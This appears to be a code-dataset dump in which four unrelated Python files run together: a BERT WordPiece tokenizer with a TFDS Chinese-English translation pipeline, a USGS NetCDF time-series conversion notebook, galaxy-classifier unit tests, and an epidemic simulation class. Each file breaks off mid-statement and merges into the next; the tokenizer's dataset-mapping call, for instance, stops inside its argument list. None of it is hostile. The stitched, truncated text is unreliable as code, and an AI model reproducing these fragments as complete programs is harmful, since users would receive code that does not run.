input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<reponame>gottaegbert/penter
import tensorflow as tf
import tensorflow_datasets as tfds
import collections
import unicodedata
import os,sys
import numpy as np
def convert_to_unicode(text):
"""Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
index = 0
with tf.io.gfile.GFile(vocab_file, "r") as reader:
while True:
token = convert_to_unicode(reader.readline())
if not token:
break
token = token.strip()
vocab[token] = index
index += 1
return vocab
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
def convert_by_vocab(vocab, items):
"""Converts a sequence of [tokens|ids] using the vocab."""
output = []
for item in items:
output.append(vocab[item])
return output
class FullTokenizer(object):
"""Runs end-to-end tokenziation."""
def __init__(self, vocab_file, do_lower_case=True):
self.vocab = load_vocab(vocab_file)
self.inv_vocab = {v: k for k, v in self.vocab.items()}
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens):
return convert_by_vocab(self.vocab, tokens)
def convert_ids_to_tokens(self, ids):
return convert_by_vocab(self.inv_vocab, ids)
class BasicTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True):
"""Constructs a BasicTokenizer.
Args:
do_lower_case: Whether to lower case the input.
"""
self.do_lower_case = do_lower_case
def tokenize(self, text):
"""Tokenizes a piece of text."""
text = convert_to_unicode(text)
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
text = self._tokenize_chinese_chars(text)
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case:
token = token.lower()
token = self._run_strip_accents(token)
split_tokens.extend(self._run_split_on_punc(token))
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text):
"""Splits punctuation on a piece of text."""
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
if _is_punctuation(char):
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer(object):
"""Runs WordPiece tokenziation."""
def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
self.vocab = vocab
self.unk_token = unk_token
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
"""Tokenizes a piece of text into its word pieces.
This uses a greedy longest-match-first algorithm to perform tokenization
using the given vocabulary.
For example:
input = "unaffable"
output = ["un", "##aff", "##able"]
Args:
text: A single token or whitespace separated tokens. This should have
already been passed through `BasicTokenizer.
Returns:
A list of wordpiece tokens.
"""
text = convert_to_unicode(text)
output_tokens = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
output_tokens.append(self.unk_token)
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr
if substr in self.vocab:
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_bad:
output_tokens.append(self.unk_token)
else:
output_tokens.extend(sub_tokens)
return output_tokens
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
def get_tokenizer(MAX_SEQ_LENGTH, BATCH_SIZE):
# ## Setup input pipleline
# Use TFDS to load the wmt2019 zh-en translation dataset.
if not os.path.exists('chinese_L-12_H-768_A-12'):
# get_ipython().system('wget https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip')
# get_ipython().system('unzip chinese_L-12_H-768_A-12')
print('download pretrained first!')
sys.exit()
config = tfds.translate.wmt.WmtConfig(
description="WMT 2019 translation task dataset.",
version="0.0.3",
language_pair=("zh", "en"),
subsets={
tfds.Split.TRAIN: ["newscommentary_v13"],
tfds.Split.VALIDATION: ["newsdev2017"],
}
)
builder = tfds.builder("wmt_translate", config=config)
print(builder.info.splits)
builder.download_and_prepare()
datasets = builder.as_dataset(as_supervised=True)
print('datasets is {}'.format(datasets))
# In[ ]:
train_examples = datasets['train']
val_examples = datasets['validation']
# In[ ]:
for zh, en in train_examples.take(1):
# print((zh))
print(tf.compat.as_text(zh.numpy()))
print(tf.compat.as_text(en.numpy()))
# Create a custom subwords tokenizer from the training dataset for the decoder.
# In[ ]:
vocab_file = 'vocab_en'
if os.path.isfile(vocab_file + '.subwords'):
tokenizer_en = tfds.features.text.SubwordTextEncoder.load_from_file(vocab_file)
else:
tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(en.numpy() for zh, en in train_examples), target_vocab_size=2 ** 13)
tokenizer_en.save_to_file('vocab_en')
sample_string = 'Transformer is awesome.'
tokenized_string = tokenizer_en.encode(sample_string)
for ts in tokenized_string:
print('{} ----> {}'.format(ts, tokenizer_en.decode([ts])))
# The encoder uses BERT tokenizer.
# In[ ]:
tokenizer_zh = FullTokenizer(
vocab_file='chinese_L-12_H-768_A-12/vocab.txt', do_lower_case=True)
test_tokens = tokenizer_zh.tokenize('今天天气不错额。')
test_ids = tokenizer_zh.convert_tokens_to_ids(['[CLS]'] + test_tokens + ['[SEP]'])
print('tokens:', test_tokens)
print('ids:', test_ids)
print('convert_ids_to_tokens:', tokenizer_zh.convert_ids_to_tokens(test_ids))
def encode(zh, en, seq_length=MAX_SEQ_LENGTH):
tokens_zh = tokenizer_zh.tokenize(tf.compat.as_text(zh.numpy()))
lang1 = tokenizer_zh.convert_tokens_to_ids(['[CLS]'] + tokens_zh + ['[SEP]'])
if len(lang1) < seq_length:
lang1 = lang1 + list(np.zeros(seq_length - len(lang1), 'int32'))
# insert SOS and EOS
lang2 = [tokenizer_en.vocab_size] + tokenizer_en.encode(
tf.compat.as_text(en.numpy())) + [tokenizer_en.vocab_size + 1]
if len(lang2) < seq_length:
lang2 = lang2 + list(np.zeros(seq_length - len(lang2), 'int32'))
return lang1, lang2
def filter_max_length(x, y, max_length=MAX_SEQ_LENGTH):
return tf.logical_and(tf.size(x) <= max_length,
tf.size(y) <= max_length)
train_dataset = train_examples.map(
lambda zh, en: tf.py_function(encode, [zh, en], [tf.int32, tf.int32]))
train_dataset = train_dataset.filter(filter_max_length)
# cache the dataset to memory to get a speedup while reading from it.
train_dataset = train_dataset.cache()
train_dataset = train_dataset.shuffle(20000).padded_batch(
BATCH_SIZE, padded_shapes=([-1], [-1]), drop_remainder=True)
train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)
val_dataset = val_examples.map(
lambda zh, en: tf.py_function(encode, [zh, en], [tf.int32, | |
<filename>cmg_ts2cf_loop.py
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <markdowncell>
# #Convert existing time series NetCDF files in 4D (T,Z,Y,X) "grid" format to CF-1.6 format
# <markdowncell>
# All the USGS time series data has traditionally been stored in PMEL EPIC-compliant NetCDF files. These files use EPIC codes for
# <codecell>
import glob
import os
import netCDF4
import StringIO
import pandas as pd
import re
# <codecell>
projs = '''
ARGO_MERCHANT,<NAME>,Argo Merchant Experiment,A moored array deployed after the ARGO MERCHANT ran aground onNantucket Shoals designed to help understand the fate of the spilled oil.
BUZZ_BAY,<NAME>,Currents and Sediment Transport in Buzzards Bay,Investigation of the near-bottom circulation in Buzzards Bay and consequent transport of fine-grained sediments that may be contaminated with PCBs from inner New Bedford Harbor.
CAMP,<NAME>,California Area Monitoring Program (CAMP),A four-year multi-disciplinary field and laboratory study to investigate the sediment transport regime in the vicinity of production drilling rigs in the Santa Barbara Basin
CAPE_COD_BAY,<NAME>,Currents and Sediment Transport in Cape Cod Bay,A pilot study to determine the effect of winter storms on sediment movement at two potential dredge spoil disposal areas.
CC_MISC,<NAME>,Transport studies - Nauset Inlet,Part of a collaborative study of sediment movement in Nauset Inlet.
DEEP_REEF,<NAME>,Gulf of Mexico - Pinnacles,Pressure data from the Gulf of Mexico
DWDS_106,<NAME>,Sediment Transport at Deep Water Dump Site 106,Near-bottom current measurements to understand the fate and transport of sludge from the New York Metropolitan region discharged at the sea surface.
ECOHAB_II,<NAME>,Ecology of Harmful Algal Blooms (ECOHAB-II),A field program to continue investigating the transport and fate of toxic dinoflagellate blooms in the western Gulf of Maine.
ECOHAB_I,<NAME>,Ecology of Harmful Algal Blooms (ECOHAB-I),A field program to study the transport and fate of toxic dinoflagellate blooms in the western Gulf of Maine.
EUROSTRATAFORM,<NAME>,EuroSTRATAFORM,The EuroSTRATAFORM Po and Apennine Sediment Transport and Accumulation (PASTA) experiment was an international study of sediment-transport processes and formation of geological strata in the Adriatic Sea.
FARALLONES,<NAME>,Farallons,Program to measure the currents and circulation on the continental slope off San Francisco CA and thus infer the transport of dredged materialat the newly-established deep-water disposal site.
GB_SED,<NAME>,Georges Bank Current and Sediment Transport Studies,A series of studies to assess environmental hazards to petroleum development in the Georges Bank and New England Shelf region
GLOBEC_GB,<NAME>,GLOBEC Georges Bank Program,A moored array program to investigate the circulation and mixing of plankton on Georges Bank.
GLOBEC_GSC,<NAME>,GLOBEC Great South Channel Circulation Experiment,A moored array program to investigate the recirculation of water and plankton around Georges Bank
GULF_MAINE,<NAME>,Deep Circulation in the Gulf of Maine,A two-year field study to investigate the deep flow between the major basins in the Gulf of Maine and the effects on the distribution of suspended sediments.
HUDSON_SVALLEY,<NAME>,Circulation and Sediment Transport in the Hudson Shelf Valley,Field experiments have been carried out to understand the transport of sediments and associated contaminants in the Hudson Shelf Valley offshore of New York.
KARIN_RIDGE,<NAME>,Karin Ridge Experiment,Current measurements collected at 2 sites in Karin Ridge Seamount.
LYDONIA_C,<NAME>,Lydonia Canyon Dynamics Experiment,A major field experiment to determine the importance of submarine canyons in sediment transport along and across the continental margin.
MAB_SED,<NAME>,Sediment Transport Observations in the Middle Atlantic Bight,A series of studies to assess environmental hazards to petroleum development in the Middle Atlantic Bight.
MAMALA_BAY,<NAME>,Mamala bay Experiment,Current measurements collected at 350-450 meters in Mamala Bay near Waikiki Beach.
MBAY_CIRC,<NAME>, Massachusetts Bay Circulation Experiment,Current measurements collected at 6 sites in Massachusetts Bay throughout the year to map the tidal wind and density driven currents.
MBAY_IWAVE,<NAME>,Massachusetts Bay Internal Wave Experiment,A 1-month 4-element moored array experiment to measure the currents associated with large-amplitude internal waves generated by tidal flow across Stellwagen Bank.
MBAY_LTB,<NAME>,Long-term observations in Massachusetts Bay; Site B-Scituate,Measurements of currents and other oceanographic properties were made to assess the impact of sewage discharge from the proposed outfall site.
MBAY_LT,<NAME>,Long-term observations in Massachusetts Bay; Site A-Boston Harbor,Measurements of currents and other oceanographic properties were made to assess the impact of sewage discharge from the proposed outfall site.
MBAY_STELL,<NAME>,Monitoring on Stellwagen Bank,A year-long series of current measurements on the eastern flank of Stellwagen Bank to document the currents at the mouth of Massachusetts Bay driven by the Maine Coastal current.
MBAY_WEST,<NAME>,Currents and Sediment Transport in Western Massachusetts Bay,A pilot winter-time experiment to investigate circulation and sediment transport. Designed to provide information to aid in citing the new ocean outfall for the Boston sewer system.
MOBILE_BAY,<NAME>,Mobile Bay Study,Measure currents and transport out of Mobile Bay.
MONTEREY_BAY,<NAME>,Monterey Bay National Marine Sanctuary Program,Part of a large multi-disciplinary experiment to characterize the geologic environment and to generate a sediment budget.
MONTEREY_CAN,<NAME>,Monterey Canyon Experiment, A program to determine the mechanisms that govern the circulation within and the transport of sediment and water through Monterey Submarine Canyon.
MYRTLEBEACH,<NAME>,Myrtle Beach Experiment SC,Measurements collected as part of a larger study to understand the physical processes that control the transport of sediments in Long Bay South Carolina.
NE_SLOPE,<NAME>,Currents on the New England Continental Slope,A study designed to describe the currents and to investigate the transport of sediment from the shelf to the slope.
OCEANOG_C,<NAME>,Oceanographer Canyon Dynamics Experiment,A field experiment to determine the importance of submarine canyons in sediment transport along and across the continental margin.
ORANGE_COUNTY,<NAME>,Orange County Sanitation District Studies,Observations to monitor coastal ocean process that transport suspended material and associated comtaminants across the shelf
PONCHARTRAIN,<NAME>,Lake Ponchartrain Project,A series of moored array studies to investigate the circulation and particle transport in Lake Pontchartrain.
PV_SHELF04,<NAME>,Palos Verdes Shelf 2004,Additional observations to estimate the quantity and direction of sediment erosion and transport on the shelf near the White Point ocean outfalls.
PV_SHELF07,<NAME>,Palos Verdes Shelf 2007,Follow-up observations to evaluate how often coastal ocean processes move the DDT contaminated sediments near the White Point ocean outfalls.
PV_SHELF,<NAME>,Palos Verdes Shelf Study,Initial observations of currents and circulation near the White Point ocean outfalls determine how often coastal ocean processes move the DDT contaminated sediments in this region.
SAB_SED,<NAME>,Sediment Transport Observations in the Southern Atlantic Bight,A series of studies to assess environmental hazards to petroleum development in the South Atlantic Bight.
SOUTHERN_CAL,<NAME>,Southern California Project,A series of moorings were deployed to understand how coastal ocean processes that move sediments change with location on the shelf.
STRESS,<NAME>,Sediment Transport on Shelves and Slopes (STRESS),Experiment on the California continental margin to investigate storm-driven sediment transport.
WRIGHTSVILLE,<NAME>,Wrightsville Beach Study, Measurements of bottom currents and waves to investigate the flow field and sediment transport in a rippled scour depression offshore of Wrightsville Beach NC.
DIAMONDSHOALS,<NAME>,Cape Hatteras- Diamond Shoals,This experiment was designed to investigate the ocean circulation and sediment transport dynamics at Diamond Shoals NC.
CHANDELEUR,<NAME>,Chandeleur Islands Oceanographic Measurements,A program to measure waves water levels and currents near the Chandeleur Islands Louisiana and adjacent berm construction site.
WFAL,<NAME>,West Falmouth Harbor Fluxes,Oceanographic and water-quality observations made at six locations in West Falmouth Harbor and Buzzards Bay.
BW2011,<NAME>, Blackwater 2011, Oceanographic and Water-Quality Measurements made at several sites in 2 watersheds in Blackwater National Wildlife Refuge.
MVCO_11,<NAME>, OASIS MVCO 2011, Near-seabed Oceanographic Observations made as part of the 2011 OASIS Project at the MVCO.
HURRIRENE_BB,<NAME>, Observations in Buzzards Bay during and after a Hurricane, Oceanographic data collected in Buzzards Bay MA during Hurricane Irene August 2011.'''
# <codecell>
project = pd.read_csv(StringIO.StringIO(projs.strip()),
sep=",\s*",index_col='project_id',
names=['project_id', 'project_pi', 'project_name','project_summary'])
# <codecell>
project.ix['PV_SHELF']
# <codecell>
project.ix['PV_SHELF'].ix['project_pi']
# <codecell>
len(project)
# <codecell>
for index,row in project.iterrows():
print index,row['project_pi']
# <codecell>
""" this is Ellyn's old Matlab code:
function nname=lookup_cf(long_name)
% LOOKUP_CF Get CF equivalent name for EPIC variable long_name
% return the new name string or [] if there's no equivalent
%
if(strfind(lower(long_name),'temp'))
nname='sea_water_temperature';
elseif (strfind(lower(long_name),'cond'))
nname='sea_water_electrical_conductivity';
elseif (strfind(lower(long_name),'sal'))
nname='sea_water_salinity';
elseif (strfind(lower(long_name),'sigma'))
nname='sea_water_sigma_theta';
% also have to deal with the min, max std of vels for burst stats files
elseif (strfind(lower(long_name),'east'))
nname='eastward_sea_water_velocity';
elseif (strfind(lower(long_name),'north'))
nname='northward_sea_water_velocity';
elseif (strfind(lower(long_name),'vertical'))
nname='upward_sea_water_velocity';
elseif (strfind(lower(long_name),'pitch'))
nname='platform_pitch_angle';
elseif (strfind(lower(long_name),'roll'))
nname='platform_roll_angle';
elseif (strfind(lower(long_name),'head'))
nname='platform_orientation';
elseif (strfind(lower(long_name),'pres'))
if ~isempty(strfind(lower(long_name),'dev')) || ~isempty(strfind(lower(long_name),'std'))
nname=[];
else
nname='sea_water_pressure';
end
elseif (strfind(lower(long_name),'cond'))
nname='sea_water_electrical_conductivity';
elseif (strfind(lower(long_name),'speed'))
if (strfind(lower(long_name),'rotor'))
nname=[];
else
nname='sea_water_speed';
end
elseif (strfind(lower(long_name),'direction'))
nname='direction_of_sea_water_velocity';
else
nname=[];
end
disp([long_name ' : ' nname])
""";
# <codecell>
#os.chdir('/usgs/data2/emontgomery/stellwagen/Data/ARGO_MERCHANT')
root_dir='/usgs/data2/emontgomery/stellwagen/Data/'
#root_dir='/usgs/data2/emontgomery/stellwagen/Data/MVCO_11'
odir='/usgs/data2/emontgomery/stellwagen/CF-1.6/'
os.chdir(root_dir)
# <codecell>
# now find all the unique names, long_names & units
names = set()
long_names = set()
units = set()
epic_keys = set()
for path, subdirs, files in os.walk(root_dir):
for name in files:
file= os.path.join(path, name)
try:
nc=netCDF4.Dataset(file)
for var in nc.variables.keys():
names.add(var)
try:
long_names.add(nc.variables[var].long_name)
except:
pass
try:
units.add(nc.variables[var].units)
except:
pass
try:
epic_keys.add(nc.variables[var].epic_key)
except:
pass
except:
pass
# <codecell>
names= list(names)
long_names = list(long_names)
units = list(units)
epic_keys = list(epic_keys)
# <codecell>
print len(names)
print | |
1, 1, 1, 1, 1, ], # Always part of main galaxy
[ 0, 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
# Run the function
actual = self.classifier.identify_is_in_main_gal()
npt.assert_allclose( expected, actual )
########################################################################
def test_identify_is_in_main_gal_density_criterion( self ):
'''Test that we can identify when a particle is in the main galaxy, including a density criterion.
'''
# Change paramters
self.classifier.min_gal_density = 0.1
# Test data setup
self.classifier.is_in_other_gal = np.array([
[ 0, 1, 1, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, 0, ], # Always part of main galaxy
[ 0, 0, 0, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
self.classifier.ptrack['Den'] = np.array([
[ 0, 0, 0, 0, 0, ], # Merger, except in early snapshots
[ np.nan, np.nan, 10., 0.01, 0.001, ], # Always part of main galaxy
[ 0, 0, 0, 0, 0, ], # CGM -> main galaxy -> CGM
])
self.classifier.ptrack['PType'] = np.array([
[ 4, 0, 0, 0, 0, ], # Merger, except in early snapshots
[ 4, 4, 0, 0, 0, ], # Always part of main galaxy
[ 0, 4, 0, 0, 0, ], # CGM -> main galaxy -> CGM
])
expected = np.array([
[ 1, 0, 0, 0, 0, ], # Merger, except in early snapshots
[ 1, 1, 1, 0, 0, ], # Always part of main galaxy
[ 0, 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
# Run the function
actual = self.classifier.identify_is_in_main_gal()
npt.assert_allclose( expected, actual )
########################################################################
def test_calc_gal_event_id( self ):
# Prerequisite
self.classifier.is_in_main_gal = np.array([
[ 1, 0, 0, 0, 0, ], # Merger, except in early snapshots
[ 1, 1, 1, 1, 1, ], # Always part of main galaxy
[ 0, 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
expected_gal_event_id = np.array([
[ 1, 0, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ -1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
])
# Run the function
actual = self.classifier.calc_gal_event_id()
npt.assert_allclose( expected_gal_event_id, actual )
#########################################################################
def test_identify_accretion( self ):
expected = np.array([
[ 1, 0, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 0, 1, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
# Get the prerequisites
self.classifier.gal_event_id= np.array([
[ 1, 0, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ -1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
])
# Run the function
actual = self.classifier.identify_accretion()
npt.assert_allclose( expected, actual )
########################################################################
def test_identify_ejection( self ):
# Prerequisites
self.classifier.ahf_reader = read_ahf.AHFReader( default_kwargs['halo_data_dir'] )
self.classifier.ahf_reader.get_mtree_halos( 'snum' )
expected = np.array([
[ 0, 0, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
# Get the prerequisites
self.classifier.gal_event_id= np.array([
[ 1, 0, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ -1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
])
self.classifier.is_in_other_gal = np.array([
[ 0, 0, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 0, 0, 0, 0, ], # CGM -> main galaxy -> CGM
])
# Run the function
actual = self.classifier.identify_ejection()
npt.assert_allclose( expected, actual )
########################################################################
def test_get_cum_num_acc( self ):
self.classifier.is_accreted = np.array([
[ 1, 0, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 0, 1, 0, 0, ], # CGM -> main galaxy -> CGM
[ 1, 0, 1, 0, ], # Accreted twice
]).astype( bool )
actual = self.classifier.get_cum_num_acc()
expected = np.array([
[ 1, 0, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
[ 2, 1, 1, 0, ], # Accreted twice
])
npt.assert_allclose( expected, actual )
########################################################################
def test_get_redshift_first_acc( self ):
self.classifier.is_before_first_acc = np.array([
[ 0, 1, 1, 1, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 0, 0, 1, 1, ], # CGM -> main galaxy -> CGM
[ 1, 1, 1, 1, ], # Never accreted
]).astype( bool )
self.classifier.n_particle = 4
expected = np.array([ 0., -1., 0.06984665, -1. ])
actual = self.classifier.get_redshift_first_acc()
npt.assert_allclose( expected, actual )
########################################################################
def test_ind_first_acc( self ):
self.classifier.is_before_first_acc = np.array([
[ 0, 1, 1, 1, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 0, 0, 1, 1, ], # CGM -> main galaxy -> CGM
[ 1, 1, 1, 1, ], # Never accreted
]).astype( bool )
self.classifier.n_particle = 4
expected = np.array([ 0, -99999, 1, -99999 ])
actual = self.classifier.ind_first_acc
npt.assert_allclose( expected, actual )
########################################################################
def test_identify_is_before_first_acc( self ):
# Prerequisites
self.classifier.cum_num_acc = np.array([
[ 1, 0, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
self.classifier.is_in_main_gal = np.array([
[ 1, 0, 0, 0, 0, ], # Merger, except in early snapshots
[ 1, 1, 1, 1, 1, ], # Always part of main galaxy
[ 0, 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
expected = np.array([
[ 0, 1, 1, 1, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 0, 0, 1, 1, ], # CGM -> main galaxy -> CGM
]).astype( bool )
actual = self.classifier.identify_is_before_first_acc()
npt.assert_allclose( expected, actual )
########################################################################
def test_get_cumulative_time_in_other_gal( self ):
'''Test that we can correctly get the cumulative time spent in another galaxy.
'''
# Test Data
self.classifier.is_in_other_gal = np.array([
[ 1, 0, 1, 0, 0, ],
[ 0, 1, 1, 1, 0, ],
[ 1, 1, 1, 0, 0, ],
]).astype( bool )
self.classifier.dt = np.array([
[ 51., 51., 51., 51., ],
[ 51., 51., 51., 51., ],
[ 51., 51., 51., 51., ],
])
expected = np.array([
[ 102., 51., 51., 0, ],
[ 153., 153., 102., 51., ],
[ 153, 102., 51., 0, ],
])
actual = self.classifier.get_cumulative_time_in_other_gal()
npt.assert_allclose( expected, actual, )
########################################################################
def test_time_in_other_gal_before_acc( self ):
# Prerequisites
self.classifier.dt = self.classifier.get_time_difference()
self.classifier.is_before_first_acc = np.array([
[ 0, 1, 1, 1, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, ], # Always part of main galaxy
[ 0, 0, 1, 1, ], # CGM -> main galaxy -> CGM
]).astype( bool )
self.classifier.is_in_other_gal = np.array([
[ 0, 1, 1, 0, 0, ], # Merger, except in early snapshots
[ 0, 0, 0, 0, 0, ], # Always part of main galaxy
[ 0, 0, 0, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
# Calculated using NED cosmology calculator
expected = np.array([
2.404, # Merger, except in early snapshots
0., # Always part of main galaxy
0., # CGM -> main galaxy -> CGM
])
actual = self.classifier.get_time_in_other_gal_before_acc()
npt.assert_allclose( expected, actual, rtol=1e-3 )
########################################################################
def test_get_time_in_other_gal_before_acc_during_interval( self ):
| |
#Classes Challenge 40: Epidemic Outbreak GUI App
import math
import random
import tkinter
class Simulation():
"""A class to control a simulation and facilitate the spread of a disease."""
def __init__(self):
"""Initialize attributes"""
self.day_number = 1
#Get simulation initial conditions from the user
#Population size must be a perfect square for this program
print("To simulate an epidemic outbreak, we must know the population size.")
self.population_size = int(input("---Enter the population size: "))
#Convert users population size to nearest perfect square for visual purposes
root = math.sqrt(self.population_size) #For example, if population_size is 79, root = 8.8881
#User did not enter a perfect square for the population
if int(root + .5)**2 != self.population_size: # int(8.881 +.5)**2 = int(9.3881)**2 = 9**2 = 81 != 79
root = round(root, 0) # round(8.881, 0) = 9.0
self.grid_size = int(root) #grid_size = 9
self.population_size = self.grid_size**2 #population_size = 9*9 = 81 the closest PERFECT SQUARE TO 79
print("Rounding population size to " + str(self.population_size) + " for visual purposes.")
#The user did enter a perfect square for the population
else:
self.grid_size = int(math.sqrt(self.population_size))
print("\nWe must first start by infecting a portion of the population.")
self.infection_percent = float(input("---Enter the percentage (0-100) of the population to initially infect: "))
self.infection_percent /= 100
print("\nWe must know the risk a person has to contract the disease when exposed.")
self.infection_probability = float(input("---Enter the probability (0-100) that a person gets infected when exposed to the disease: "))
print("\nWe must know how long the infection will last when exposed.")
self.infection_duration = int(input("---Enter the duration (in days) of the infection: "))
print("\nWe must know the mortality rate of those infected.")
self.mortality_rate = float(input("---Enter the mortality rate (0-100) of the infection: "))
print("\nWe must know how long to run the simulation.")
self.sim_days = int(input("---Enter the number of days to simulate: "))
class Person():
"""A class to model an individual person."""
def __init__(self):
"""Initialize attributes"""
self.is_infected = False #Person starts healthy, not infected
self.is_dead = False #Person starts ALIVE
self.days_infected = 0 #Keeps track of days infected for individual person
def infect(self, simulation):
"""Infect a person based on sim conditions"""
#random number generated must be less than infection_probability to infect
if random.randint(0, 100) < simulation.infection_probability:
self.is_infected = True
def heal(self):
"""Heals a person from an infection"""
self.is_infected = False
self.days_infected = 0
def die(self):
"""Kill a person"""
self.is_dead = True
def update(self, simulation):
"""Update an individual person if the person is not dead. Check if they are infected
If they are, increase the days infected count, then check if they should die or be healed."""
#Check if the person is not dead before updating
if not self.is_dead:
#Check if the person is infected
if self.is_infected:
self.days_infected += 1
#Check to see if the person will die
if random.randint(0, 100) < simulation.mortality_rate:
self.die()
